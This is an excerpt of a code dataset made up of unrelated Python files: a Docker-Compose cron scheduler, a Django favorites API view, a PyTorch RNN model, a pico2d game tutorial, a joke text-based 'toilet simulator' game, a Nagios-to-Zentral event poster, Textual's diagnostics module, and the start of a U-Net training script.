namedtuple\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\nimport yaml\nimport delorean\n\nfrom config import TaskConfig, ConfigException\nfrom mailsender import MailSender\nimport logconfig\n\n\nlogger = logging.getLogger('docron')\n\n\nclass DirectoryWatch:\n \"\"\"Runs `callback` whenever something happens within `path`.\"\"\"\n\n def __init__(self, path, callback):\n class Handler(FileSystemEventHandler):\n def on_any_event(self, _):\n callback()\n\n self.observer = Observer()\n self.observer.schedule(Handler(), path, recursive=True)\n\n def start(self):\n self.observer.start()\n\n def stop(self):\n self.observer.stop()\n\n\nclass TaskParser:\n def __init__(self, path, config_filename):\n self.path = path\n self.config_filename = config_filename\n self._tasks = {}\n self.lock = Lock()\n self.dirwatch = DirectoryWatch(path, self.rescan)\n\n @property\n def tasks(self):\n with self.lock:\n ret = self._tasks\n return ret\n\n def start(self):\n self.dirwatch.start()\n self.rescan()\n\n def stop(self):\n self.dirwatch.stop()\n\n def scandir(self, fullpath, name):\n conf = os.path.join(fullpath, self.config_filename)\n dc = os.path.join(fullpath, 'docker-compose.yml')\n\n if not os.path.isfile(conf):\n return None\n if not os.path.isfile(dc):\n logger.warning('No docker-compose.yml in %s' % fullpath)\n return None\n\n with open(conf, 'r') as stream:\n try:\n config = yaml.load(stream)\n except yaml.YAMLError:\n logger.exception('yaml parse error: %s' % conf)\n return None\n\n try:\n tc = TaskConfig(config, fullpath, name)\n except ConfigException:\n return None\n return tc\n\n def rescan(self):\n with self.lock:\n self._tasks = {}\n for name in os.listdir(self.path):\n fullpath = os.path.join(self.path, name)\n if not os.path.isdir(fullpath):\n continue\n config = self.scandir(fullpath, name)\n if config:\n self._tasks[name] = (name, config)\n else:\n logger.warning('Invalid config for %s' % name)\n\n\nclass StreamReader(Thread):\n def __init__(self, stream, name):\n self.stream = stream\n self.lines = []\n self.lock = Lock()\n self.log = logging.getLogger(name)\n super(StreamReader, self).__init__()\n\n def getlist(self):\n with self.lock:\n return self.lines[:]\n\n def getstr(self):\n return ''.join(self.getlist())\n\n def run(self):\n for l in self.stream:\n self.log.info(l)\n with self.lock:\n self.lines.append(l)\n\n\nclass ProcessChecker(Thread):\n def __init__(self, task):\n self.task = task\n self.log = logging.getLogger('%s-checker' % task)\n super(ProcessChecker, self).__init__()\n\n def run(self):\n self.log.debug('Starting checker')\n while True:\n retcode = self.task.subprocess.poll()\n if retcode is not None:\n self.task.finished_at = self.task.now\n stdout = self.task.stdout.getlist()\n\n if retcode != 0:\n self.task.status = retcode\n self.task.failure()\n else:\n code = int(stdout[-1].split()[-1])\n self.task.status = code\n if code != 0:\n self.task.failure()\n else:\n self.task.success()\n\n del self.task.runner.runningtasks[self.task.name]\n break\n time.sleep(1)\n\n\nclass Task:\n CTask = namedtuple(\n 'CTask',\n 'name config status started_at finished_at trigger_period '\n 'stdout stderr')\n\n def __init__(self, name, config, runner):\n self.name = name\n self.config = config\n self.subprocess = None\n self.status = None\n self.started_at = None\n self.finished_at = None\n self.trigger_period = None\n self.stdout = None\n self.stderr = None\n self.runner = runner\n\n @property\n def context(self):\n return self.CTask(\n self.name, self.config,\n self.status if self.status is not None else '-',\n self.started_at or '-',\n self.finished_at or '-',\n self.trigger_period or '-',\n self.stdout.getstr() if self.stdout else '-',\n self.stderr.getstr() if self.stderr else '-')\n\n @property\n def now(self):\n n = delorean.utcnow()\n tz = self.trigger_period.timezone\n return DocronTime(n, fmt_tz=tz)\n\n def run(self):\n self.runner.runningtasks[self.name] = self\n logger.info('running %s' % self)\n sp = subprocess.Popen(\n ['docker-compose up --no-color'],\n cwd=self.config.fullpath,\n bufsize=1,\n universal_newlines=True,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n self.subprocess = sp\n self.stdout = StreamReader(sp.stdout, self.name + '/stdout')\n self.stderr = StreamReader(sp.stderr, self.name + '/stderr')\n self.checker = ProcessChecker(self)\n self.stdout.start()\n self.stderr.start()\n self.checker.start()\n\n def stop(self):\n subprocess.run(\n ['docker-compose stop'],\n cwd=self.config.fullpath,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n def checkrun(self):\n self.started_at = self.now\n if self.name in self.runner.runningtasks:\n running_task = self.runner.runningtasks[self.name]\n self.skipped(running_task)\n else:\n self.run()\n\n def __str__(self):\n return self.name\n\n def mail(self, typ, **kwargs):\n mailconfig = getattr(self.config.mail, typ)\n if mailconfig.to:\n try:\n body = mailconfig.template.render(task=self.context, **kwargs)\n except Exception:\n msg = 'Exception during rendering %s e-mail for %s'\n msg = msg % (typ, self)\n logger.exception(msg)\n else:\n self.runner.mailsender.push(mailconfig, body)\n\n def success(self):\n logger.info('success: %s' % self)\n self.mail('success')\n\n def skipped(self, running_task):\n logger.warning('skipping: %s' % self)\n self.mail('skipped', running_task=running_task.context)\n\n def failure(self):\n logger.warning('failure: %s' % self)\n self.mail('failure')\n\n\nclass DocronTime:\n def __init__(self, delorean_object,\n fmt='%Y-%m-%d %H:%M:%S %Z(%z)', fmt_tz=None):\n self.delorean_object = delorean_object\n self.fmt = fmt\n self.fmt_tz = fmt_tz\n\n def format(self, fmt=None, timezone=None):\n fmt = fmt or self.fmt\n timezone = timezone or self.fmt_tz\n\n d = self.delorean_object\n if timezone is not None:\n d = d.shift(timezone)\n return d.datetime.strftime(fmt)\n\n def __str__(self):\n return self.format()\n\n\nclass TaskRunner:\n def __init__(self):\n self.taskparser = TaskParser('tasks', '.config.yml')\n self.mailsender = MailSender()\n self.runningtasks = {}\n self.first_check = True\n\n def start(self):\n logger.info('Starting Docron')\n self.taskparser.start()\n self.mailsender.start()\n try:\n self.runforever()\n except KeyboardInterrupt:\n pass\n finally:\n self.stop()\n\n def runforever(self):\n last_checked_time = int(time.time())\n while True:\n now = int(time.time())\n for sec in range(last_checked_time + 1, now + 1):\n self.check_for_second(sec)\n self.first_check = False\n last_checked_time = now\n time.sleep(1)\n\n def check(self, period, sec):\n d = delorean.epoch(sec).shift(period.timezone)\n dt = d.datetime\n dow = dt.isocalendar()[2]\n if dt.year not in period.year:\n return False\n if dt.month not in period.month:\n return False\n if dt.day not in period.day_of_month:\n return False\n if dt.hour not in period.hours:\n return False\n if dt.minute not in period.minutes:\n return False\n if dt.second not in period.seconds:\n return False\n if dow not in period.day_of_week:\n return False\n return True\n\n def check_for_second(self, sec):\n tasks = self.taskparser.tasks\n for name, config in tasks.values():\n task = Task(name, config, self)\n torun = False\n if self.first_check and task.config.schedule.runonstart:\n torun = True\n for p in task.config.schedule.periods:\n if torun:\n break\n if self.check(p, sec):\n torun = True\n task.trigger_period = p\n if torun:\n task.checkrun()\n\n def stop(self):\n logger.info('Stopping Docron')\n self.taskparser.stop()\n self.mailsender.stop()\n for t in self.runningtasks.values():\n t.stop()\n\n\ndef start():\n logconfig.configure_logging()\n runner = TaskRunner()\n runner.start()\n\n\nif __name__ == '__main__':\n start()\n","sub_path":"src/docron.py","file_name":"docron.py","file_ext":"py","file_size_in_byte":9893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"273280067","text":"\"\"\" Copyright 2014 UW Information Technology, University of Washington\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n\"\"\"\n\nfrom spotseeker_server.views.rest_dispatch import RESTDispatch, JSONResponse\nfrom spotseeker_server.require_auth import user_auth_required\nfrom spotseeker_server.models import Spot, FavoriteSpot\nfrom django.http import HttpResponse\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass FavoritesView(RESTDispatch):\n \"\"\" Performs actions on the user's favorites, at /api/v1/user/me/favorites.\n GET returns 200 with a list of spots.\n \"\"\"\n @user_auth_required\n def GET(self, request, spot_id=None):\n if spot_id is None:\n return self._get_all_favorites(request)\n else:\n return self._get_is_favorite(request, spot_id)\n\n @user_auth_required\n def PUT(self, request, spot_id):\n user = self._get_user(request)\n spot = Spot.objects.get(pk=spot_id)\n\n log_message = (\"user: %s; spot_id: %s; favorite added\" %\n (user.username, spot.pk))\n logger.info(log_message)\n fav, created = FavoriteSpot.objects.get_or_create(user=user, spot=spot)\n return JSONResponse(True)\n\n @user_auth_required\n def DELETE(self, request, spot_id):\n user = self._get_user(request)\n spot = Spot.objects.get(pk=spot_id)\n\n fav = FavoriteSpot.objects.filter(user=user, spot=spot)\n for obj in fav:\n fav.delete()\n\n log_message = (\"user: %s; spot_id: %s; favorite removed\" %\n (user.username, spot.pk))\n logger.info(log_message)\n return JSONResponse(\"\")\n\n def _get_all_favorites(self, request):\n user = self._get_user(request)\n favorites = []\n\n objects = FavoriteSpot.objects.filter(user=user)\n\n for fav in objects:\n if hasattr(fav, 'spot'):\n json = fav.spot.json_data_structure()\n favorites.append(json)\n\n return JSONResponse(favorites)\n\n def _get_is_favorite(self, request, spot_id):\n user = self._get_user(request)\n spot = Spot.objects.get(pk=spot_id)\n\n fav = FavoriteSpot.objects.filter(user=user, spot=spot)\n if fav:\n return JSONResponse(True)\n return JSONResponse(False)\n","sub_path":"spotseeker_server/views/favorites.py","file_name":"favorites.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"520571279","text":"import torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import from_numpy as to_tensor\n\nfrom ran import RAN\n\nclass RNNModel(nn.Module):\n \"\"\"\n Container module with an embedding layer, a recurrent layer, and an\n output layer.\n \"\"\"\n\n def __init__(self,\n rnn_type,\n vocab_size,\n embed_dims,\n n_units,\n n_layers,\n embeddings=None,\n bidirectional=False,\n dropout=0.2,\n tie_weights=False):\n super(RNNModel, self).__init__()\n\n # optionally add dropout regularisation\n self.dropout = nn.Dropout(dropout)\n\n # the embedding matrix of size |V| x d\n self.embed = nn.Embedding(vocab_size, embed_dims)\n if embeddings is not None:\n self.embed.weight = nn.Parameter(to_tensor(embeddings))\n\n self.bidir = bidirectional\n\n # select the correct architecture\n\n if rnn_type in ['LSTM', 'GRU']:\n self.rnn_type = rnn_type\n self.rnn = getattr(nn, rnn_type)(embed_dims,\n n_units,\n n_layers,\n dropout=dropout,\n bidirectional=self.bidir)\n elif rnn_type == 'RAN':\n self.rnn = RAN(embed_dims, n_units, n_layers, dropout=dropout)\n else:\n try:\n model_info = rnn_type.split(\"_\")\n self.rnn_type = model_info[0]\n nonlinearity = model_info[1].lower()\n except KeyError:\n raise ValueError(\"An invalid option for `--model` was supplied.\\\n Options are ['LSTM', 'GRU', 'RNN_TANH', or\\\n 'RNN_RELU']\")\n self.rnn = nn.RNN(embed_dims,\n n_units,\n n_layers,\n nonlinearity=nonlinearity,\n dropout=dropout,\n bidirectional=self.bidir)\n\n # bidirectional needs 2x units\n n = int(self.bidir) + 1\n # output is linear as softmax is applied within the loss function\n self.output = nn.Linear(n * n_units, vocab_size)\n\n # Optionally tie weights as in:\n # \"Using the Output Embedding to Improve Language Models\" (Press & Wolf,\n # 2016) https://arxiv.org/abs/1608.05859\n # and\n # \"Tying Word Vectors and Word Classifiers: A Loss Framework for\n # Language Modeling\" (Inan et al. 2016) https://arxiv.org/abs/1611.01462\n if tie_weights:\n if n_units != embed_dims:\n raise ValueError('When using the tied flag, n_units must be\\\n equal to embdims')\n self.output.weight = self.embed.weight\n\n self.init_weights()\n\n self.rnn_type = rnn_type\n self.n_units = n_units\n self.n_layers = n_layers\n\n\n def init_weights(self):\n nn.init.xavier_uniform(self.embed.weight)\n self.output.bias.data.fill_(0)\n nn.init.xavier_uniform(self.output.weight)\n\n # This was the original RNN initialisation:\n # initrange = 0.1\n # self.embed.weight.data.uniform_(-initrange, initrange)\n # self.output.bias.data.fill_(0)\n # self.output.weight.data.uniform_(-initrange, initrange)\n\n\n def forward(self, input, hidden):\n # Apply dropout to embedding layer as in \"A Theoretically Grounded\n # Application of Dropout in Recurrent Neural Networks\" (Gal &\n # Ghahramani, 2016) https://arxiv.org/pdf/1512.05287.pdf\n embed = self.dropout(self.embed(input))\n rnn_output, hidden = self.rnn(embed, hidden)\n rnn_output = self.dropout(rnn_output)\n output = self.output(rnn_output.view(\n rnn_output.size(0) * rnn_output.size(1),\n rnn_output.size(2)))\n\n return output.view(rnn_output.size(0),\n rnn_output.size(1),\n output.size(1)\n ), hidden\n\n\n def init_hidden(self, batch_size):\n weight = next(self.parameters()).data\n n = int(self.bidir) + 1 # bidirectional needs 2x units\n\n if self.rnn_type == 'LSTM':\n return (Variable(weight.new(\n n * self.n_layers, batch_size, self.n_units).zero_()),\n (Variable(weight.new(\n n * self.n_layers, batch_size, self.n_units).zero_())))\n else:\n return Variable(weight.new(\n n * self.n_layers, batch_size, self.n_units).zero_())\n","sub_path":"recurrent/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"501353929","text":"\"\"\"\nThis module stores classes for media objects, like Movie, Video, Show\n\"\"\"\n\nclass Movie(object):\n \"\"\"\n A class for a basic high-level abstraction on a movie and key web links\n \"\"\"\n\n def __init__(self,\n title,\n description,\n poster_image_url,\n trailer_youtube_url):\n \"\"\"\n Initializes and instance of the Movie() class\n :param self: \n :param title: \n :param description: \n :param poster_image_url: \n :param trailer_youtube_url: \n \"\"\" \n self.title = title\n self.description = description\n self.poster_image_url = poster_image_url\n self.trailer_youtube_url = trailer_youtube_url\n\n def getmoviesummaries(self, movie):\n \"\"\"\n Returns the a title and Description of the movie\n \"\"\"\n return str.format(\n \"Title: {0} - Description: {1}\",\n movie.title,\n movie.description)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"188602824","text":"import random\r\nprint(\"Hello! Welcome to my toilet simulator!\")\r\nprint(\"Press enter to continue\")\r\nh = input(\">\").lower()\r\nno = False\r\nnoob = False\r\nyes = False\r\nif h == (\"no\"):\r\n print(\"You bumbling bafoon, you are an absolute idiot and a stupid member of the land\")\r\n no = True\r\nif h == (\"obama\"):\r\n print(\"Do you think you're funny? Do that again and you will lose you nae nae privleges\")\r\n noob = True\r\nif h == (\"yes\"):\r\n print(\"no\")\r\n yes = True\r\nelse:\r\n yes = True\r\ntoiletmenu = True\r\nflushes = 0\r\nhp = 10\r\npaper = 0\r\nhpaper = 0\r\ncons = 0\r\nhouses = 1\r\ntoilets = 0\r\ncontoilets = 1\r\nfgain = 0\r\nwhile True:\r\n while toiletmenu == True:\r\n print(\"---------------------------------------------------------------------------------------------------------------------------\")\r\n print(\"TOILET ONLINE\")\r\n print(\"enter 'f' for flush, 't' for toilet paper, 'p' to view property, and 's' for shop!\")\r\n tmenu = input(\"> \").lower()\r\n if tmenu == (\"f\"):\r\n if noob == False:\r\n print(\"Toilet flushed successfully, you earned 1 flushcoin plus 1 for each piece of paper you flushed, per connected toilet flushed!\")\r\n fgain = (hpaper + 1) * contoilets\r\n flushes = flushes + fgain\r\n fgain = 0\r\n hpaper = 0\r\n print(\"You now have \", flushes, \" flushcoins\")\r\n else:\r\n print(\"In your attempt to flush the toilet you punch yourself in the face. -1 HP\")\r\n hp = hp -1\r\n print (\"you now have \", hp, \" hp left\")\r\n if hp < 1:\r\n print (\"You have died and become a ghost. On the plus side you learned to flush a toilet, practice makes perfect\")\r\n if tmenu == (\"t\"):\r\n if yes == False:\r\n if paper < 1:\r\n print(\"Your toilet paper holder is empty\")\r\n print(\"You are currently holding\", hpaper, \"pieces of toilet paper\")\r\n else:\r\n print(\"You took all of your toilet paper!\")\r\n hpaper = hpaper + paper\r\n print(\"You are holding\", hpaper, \"pieces of toilet paper\")\r\n paper = 0\r\n else:\r\n print(\"You reach for the toilet paper, however, you have placed it on the holder the wrong way around. Society abandons you.\")\r\n yes = False\r\n no = True\r\n if tmenu == (\"s\"):\r\n if no == True:\r\n print(\"On your way to the local shop you are spotted by police who arrest you and take you to a mental facility. The mental facility is titled toilet simulator. You walk to the shops\")\r\n no = False\r\n print(\"Welcome to the shops, here you can buy stuff with flushcoins you have collected\")\r\n print(\"Press 'x' to purchase and open a standard toilet box\")\r\n print(\"Press 'y' to purchase and open a deluxe toilet box\")\r\n print(\"More toilet boxes and toilet season pass coming soon\")\r\n print(\"If you want to go back press enter.\")\r\n smenu = input(\">\").lower()\r\n if smenu == (\"x\"):\r\n if flushes > 4:\r\n lootrnd = (random.randint(60, 100) // 20) + (random.randint(20, 40) % random.randint(2, 10))\r\n lootrnd = int(lootrnd)\r\n lootrnd = lootrnd * 2\r\n flushes = flushes - 5\r\n if lootrnd == 55:\r\n print(\"JACKPOT!!!!\")\r\n print(\"You have recived 5 houses, 5 toilets and 5 flush connectors\")\r\n toilets = toilets + 5\r\n houses = houses + 5\r\n cons = cons + 5\r\n else:\r\n paper = paper + lootrnd\r\n print(\"You gained \", lootrnd, \" pieces of toilet paper, you now have \", paper, \" pieces of toilet paper\")\r\n else:\r\n print(\"You need\", (5 - flushes), \"more flush coins to purchase a standard lootbox\")\r\n elif smenu == (\"y\"):\r\n if flushes > 19:\r\n flushes = flushes - 20\r\n lootrnd = random.randint(1, 10)\r\n if lootrnd <= 4:\r\n print(\"You gained\", lootrnd, \"toilets\")\r\n toilets = toilets + lootrnd\r\n elif lootrnd == 5 or lootrnd == 6 or lootrnd == 7 or lootrnd == 8:\r\n print(\"You gained 1 toilet connector\")\r\n cons = cons + 1\r\n elif lootrnd == 9:\r\n print(\"You gained 1 house\")\r\n houses = houses + 1\r\n else:\r\n print(\"Better luck next time!\")\r\n else:\r\n print(\"You need \", (20 - flushes), \" more flushcoins to purchase a deluxe toilet box\")\r\n if tmenu == (\"p\"):\r\n print(\"You currently have \", houses, \" houses\")\r\n print(\"You currently have \", toilets, \" unconnected toilets\")\r\n print(\"You currently have \", cons, \" connectors\")\r\n print(\"You currently have \", contoilets, \" connected toilets\")\r\n print(\"Press 'a' to connect a toilet, rember there a maximum of 5 toilets connected per house owned\")\r\n print(\"Otherwise, press enter to cancel\")\r\n a = input(\">\").lower()\r\n if a == \"a\":\r\n if toilets > 0:\r\n if cons > 0:\r\n if (contoilets // houses) < 5:\r\n toilets = toilets - 1\r\n cons = cons - 1\r\n contoilets = contoilets + 1\r\n print(\"Successfully connected toilet, you now have \", contoilets, \" connected toilets\")\r\n else:\r\n print(\"All of your houses are full\")\r\n else:\r\n print(\"You don't have enough toilet connectors\")\r\n else:\r\n print(\"You don't have enough toilets\")\r\n","sub_path":"toilet simulator.py","file_name":"toilet simulator.py","file_ext":"py","file_size_in_byte":6213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"148659308","text":"from pico2d import*\r\n\r\nclass Tutorial:\r\n MOVE_TUTORIAL, BULLET_TUTORIAL, BUMP_TUTORIAL = 0, 1, 2\r\n\r\n\r\n def bullet_tutorial(self):\r\n if self.state == self.BULLET_TUTORIAL:\r\n return True\r\n else:\r\n return False\r\n\r\n def next_tutorial(self):\r\n if self.state == self.MOVE_TUTORIAL:\r\n self.state = self.BULLET_TUTORIAL\r\n\r\n def big_next(self):\r\n self.next_frame_x = 220\r\n self.next_frame_y = 120\r\n\r\n def small_next(self):\r\n self.next_frame_x = 200\r\n self.next_frame_y = 100\r\n\r\n def handle_event(self, event):\r\n x, y = event.x, 1000 - event.y\r\n\r\n if x >= 800: return False\r\n if x <= 600: return False\r\n if y >= 930: return False\r\n if y <= 870: return False\r\n\r\n return True\r\n\r\n\r\n def __init__(self):\r\n self.state = self.MOVE_TUTORIAL\r\n\r\n self.next_frame_x, self.next_frame_y = 200, 100\r\n\r\n self.esc_image = load_image('png_file\\esc_tutorial.png')\r\n self.move_image = load_image('png_file\\move_tutorial.png')\r\n self.move_sub_image = load_image('png_file\\move_tutorial_sub.png')\r\n self.bullet_sub_image = load_image('png_file\\_bullet_tutorial_sub.png')\r\n\r\n self.next_image = load_image('png_file\\_next_tutorial.png')\r\n\r\n\r\n def update(self, frame_time):\r\n pass\r\n\r\n\r\n def draw(self):\r\n self.next_image.clip_draw(0, 0, self.next_frame_x, self.next_frame_y, 700, 900)\r\n\r\n self.esc_image.draw(150, 950)\r\n if self.state == self.MOVE_TUTORIAL:\r\n self.move_image.draw(400, 200)\r\n self.move_sub_image.draw(400, 600)\r\n\r\n elif self.state == self.BULLET_TUTORIAL:\r\n self.bullet_sub_image.draw(400, 600)","sub_path":"2D_GAME_7/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"463420217","text":"#!/usr/bin/python\nimport argparse\nimport json\nimport ssl\nimport urllib2\n\nURL = \"%TLS_HOSTNAME%/nagios/post_event/\"\nUSER_AGENT = \"Zentral/neh 0.1\"\nHEADER = \"Zentral-API-Secret\"\nSECRET = \"%SECRET%\"\nZENTRAL_FULLCHAIN = u\"\"\"\n%FULLCHAIN%\n\"\"\"\n\n\nARGS = {\n \"host\": (\n (\"state\", \"$HOSTSTATE$\", str),\n (\"state_type\", \"$HOSTSTATETYPE$\", str),\n (\"attempt\", \"$HOSTATTEMPT$\", int),\n (\"name\", \"$HOSTNAME$\", str),\n (\"display_name\", \"$HOSTDISPLAYNAME$\", str),\n (\"address\", \"$HOSTADDRESS$\", str),\n (\"check_output\", \"$LONGHOSTOUTPUT$\", str),\n ),\n \"service\": (\n (\"state\", \"$SERVICESTATE$\", str),\n (\"state_type\", \"$SERVICESTATETYPE$\", str),\n (\"attempt\", \"$SERVICEATTEMPT$\", int),\n (\"description\", \"$SERVICEDESC$\", str),\n (\"check_output\", \"$LONGSERVICEOUTPUT$\", str),\n ),\n}\n\n\ndef build_payload(args):\n event_type = args.event_type\n payload_d = {\"event_type\": \"nagios_{}_event\".format(event_type)}\n for attr, _, _ in ARGS[event_type]:\n v = getattr(args, attr, None)\n if v:\n payload_d[attr] = v[0]\n return json.dumps(payload_d)\n\n\ndef post_event(args):\n req = urllib2.Request(URL)\n req.add_header('Content-Type', 'application/json')\n req.add_header('User-Agent', USER_AGENT)\n req.add_header(HEADER, SECRET)\n ctx = ssl.create_default_context(cadata=ZENTRAL_FULLCHAIN.strip() or None)\n data = build_payload(args)\n response = urllib2.urlopen(req, data=data, context=ctx)\n return json.load(response)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Post nagios event to Zentral.')\n subparsers = parser.add_subparsers(title=\"event types\",\n description=\"valid event types\",\n dest=\"event_type\")\n for event_type, event_type_args in ARGS.items():\n subparser = subparsers.add_parser(event_type, help=\"Post nagios {} event to Zentral.\".format(event_type))\n for attr, nagios_macro, attr_type in event_type_args:\n subparser.add_argument(attr, type=attr_type, nargs=1, help=nagios_macro)\n args = parser.parse_args()\n post_event(args)\n","sub_path":"zentral/contrib/nagios/event_handlers/zentral_event_handlers_py27.py","file_name":"zentral_event_handlers_py27.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"275302516","text":"import random,logging\nlogging.basicConfig(filename='log.txt',level=logging.DEBUG,format='%(asctime)s-%(levelname)s-%(message)s')\nguess=''\ndic={0:'tails',1:'heads'}\nlogging.debug('Start of program')\n#while guess not in ('heads','tails'):\nprint('Guess the coin toss!Enter heads or tails')\nlogging.debug('Value of guess is '+guess)\nguess=input()\ntoss=random.randint(0,1) #0 is tails\nlogging.debug('Value of toss is %s and guess is %s'% (toss,guess))\nif dic[toss] == guess:\n\tprint('You got it')\nelse:\n\tprint('Nope!Guess again')\n\tguess=input()\n\tlogging.debug('Value of next guess is '+guess)\nif dic[toss]==guess:\n\tprint('You got it!')\nelse:\n\tprint('Nope.You are really bad at this game')\nlogging.debug('End of program')\n","sub_path":"chap10/cointoss.py","file_name":"cointoss.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"500506912","text":"\"\"\"Textual CLI command code to print diagnostic information.\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport platform\nimport sys\nfrom functools import singledispatch\nfrom typing import Any\n\nfrom importlib_metadata import version\nfrom rich.console import Console, ConsoleDimensions\n\n\ndef _section(title: str, values: dict[str, str]) -> None:\n \"\"\"Print a collection of named values within a titled section.\n\n Args:\n title: The title for the section.\n values: The values to print out.\n \"\"\"\n max_name = max(map(len, values.keys()))\n max_value = max(map(len, values.values()))\n print(f\"## {title}\")\n print()\n print(f\"| {'Name':{max_name}} | {'Value':{max_value}} |\")\n print(f\"|-{'-' * max_name}-|-{'-'*max_value}-|\")\n for name, value in values.items():\n print(f\"| {name:{max_name}} | {value:{max_value}} |\")\n print()\n\n\ndef _versions() -> None:\n \"\"\"Print useful version numbers.\"\"\"\n _section(\"Versions\", {\"Textual\": version(\"textual\"), \"Rich\": version(\"rich\")})\n\n\ndef _python() -> None:\n \"\"\"Print information about Python.\"\"\"\n _section(\n \"Python\",\n {\n \"Version\": platform.python_version(),\n \"Implementation\": platform.python_implementation(),\n \"Compiler\": platform.python_compiler(),\n \"Executable\": sys.executable,\n },\n )\n\n\ndef _os() -> None:\n _section(\n \"Operating System\",\n {\n \"System\": platform.system(),\n \"Release\": platform.release(),\n \"Version\": platform.version(),\n },\n )\n\n\ndef _guess_term() -> str:\n \"\"\"Try and guess which terminal is being used.\n\n Returns:\n The best guess at the name of the terminal.\n \"\"\"\n\n # First obvious place to look is in $TERM_PROGRAM.\n term_program = os.environ.get(\"TERM_PROGRAM\")\n\n if term_program is None:\n # Seems we couldn't get it that way. Let's check for some of the\n # more common terminal signatures.\n if \"ALACRITTY_WINDOW_ID\" in os.environ:\n term_program = \"Alacritty\"\n elif \"KITTY_PID\" in os.environ:\n term_program = \"Kitty\"\n elif \"WT_SESSION\" in os.environ:\n term_program = \"Windows Terminal\"\n elif \"INSIDE_EMACS\" in os.environ and os.environ[\"INSIDE_EMACS\"]:\n term_program = (\n f\"GNU Emacs {' '.join(os.environ['INSIDE_EMACS'].split(','))}\"\n )\n elif \"JEDITERM_SOURCE_ARGS\" in os.environ:\n term_program = \"PyCharm\"\n\n else:\n # See if we can pull out some sort of version information too.\n term_version = os.environ.get(\"TERM_PROGRAM_VERSION\")\n if term_version is not None:\n term_program = f\"{term_program} ({term_version})\"\n\n return \"*Unknown*\" if term_program is None else term_program\n\n\ndef _env(var_name: str) -> str:\n \"\"\"Get a representation of an environment variable.\n\n Args:\n var_name: The name of the variable to get.\n\n Returns:\n The value, or an indication that it isn't set.\n \"\"\"\n return os.environ.get(var_name, \"*Not set*\")\n\n\ndef _term() -> None:\n \"\"\"Print information about the terminal.\"\"\"\n _section(\n \"Terminal\",\n {\n \"Terminal Application\": _guess_term(),\n \"TERM\": _env(\"TERM\"),\n \"COLORTERM\": _env(\"COLORTERM\"),\n \"FORCE_COLOR\": _env(\"FORCE_COLOR\"),\n \"NO_COLOR\": _env(\"NO_COLOR\"),\n },\n )\n\n\n@singledispatch\ndef _str_rich(value: Any) -> str:\n \"\"\"Convert a rich console option to a string.\n\n Args:\n value: The value to convert to a string.\n\n Returns:\n The string version of the value for output\n \"\"\"\n return str(value)\n\n\n@_str_rich.register\ndef _(value: ConsoleDimensions) -> str:\n return f\"width={value.width}, height={value.height}\"\n\n\ndef _console() -> None:\n \"\"\"Print The Rich console options.\"\"\"\n _section(\n \"Rich Console options\",\n {k: _str_rich(v) for k, v in Console().options.__dict__.items()},\n )\n\n\ndef diagnose() -> None:\n \"\"\"Print information about Textual and its environment to help diagnose problems.\"\"\"\n print(\"\")\n print(\"# Textual Diagnostics\")\n print()\n _versions()\n _python()\n _os()\n _term()\n _console()\n # TODO: Recommended changes. Given all of the above, make any useful\n # recommendations to the user (eg: don't use Windows console, use\n # Windows Terminal; don't use macOS Terminal.app, etc).\n","sub_path":"src/textual/cli/tools/diagnose.py","file_name":"diagnose.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"218535969","text":"import numpy as np \nimport tensorflow as tf\nimport tensorflow.keras as tfk\nimport os\nfrom glob import glob\n\nimport logging\ntf.get_logger().setLevel(logging.ERROR)\n\nimport utils\nimport augmentation\nimport losses\nimport u_net2\nimport base_cnn\n\nTRAIN_DIR = os.path.join('data','labelled')\nUNLABELLED_TRAIN_DIR = os.path.join('data','unlabelled')\nVALID_DIR = os.path.join('data','valid_labelled')\n\nIMG_DIM = [192, 192]\nNO_CHANNELS = 1\nNO_CLASSES = 4\nNO_DOMAINS = 3\nBATCH_SIZE = 16\nNO_TRAIN_IMAGES = len(glob(os.path.join(TRAIN_DIR,'*sa.nii.gz'))) \nNO_VALID_IMAGES = len(glob(os.path.join(VALID_DIR,'*sa.nii.gz'))) \nNO_TRAIN_STEPS = NO_TRAIN_IMAGES // BATCH_SIZE\nNO_VALID_STEPS = NO_VALID_IMAGES // BATCH_SIZE\nNO_FILTERS = 16\nRES_STEPS = 5\n\nNO_EPOCHS = 1000\n\n# Images in the dataset will be x,y,z,2 (we have 2 time points ED and ES) \n# since we want only one time point as a training example, we can sample \n# randomly during augmentation. We can do the same random sampling from \n# the z direction to get a 2D input.\n# I will take the central 192 x 192 patch for training\n\nin_dim1 = 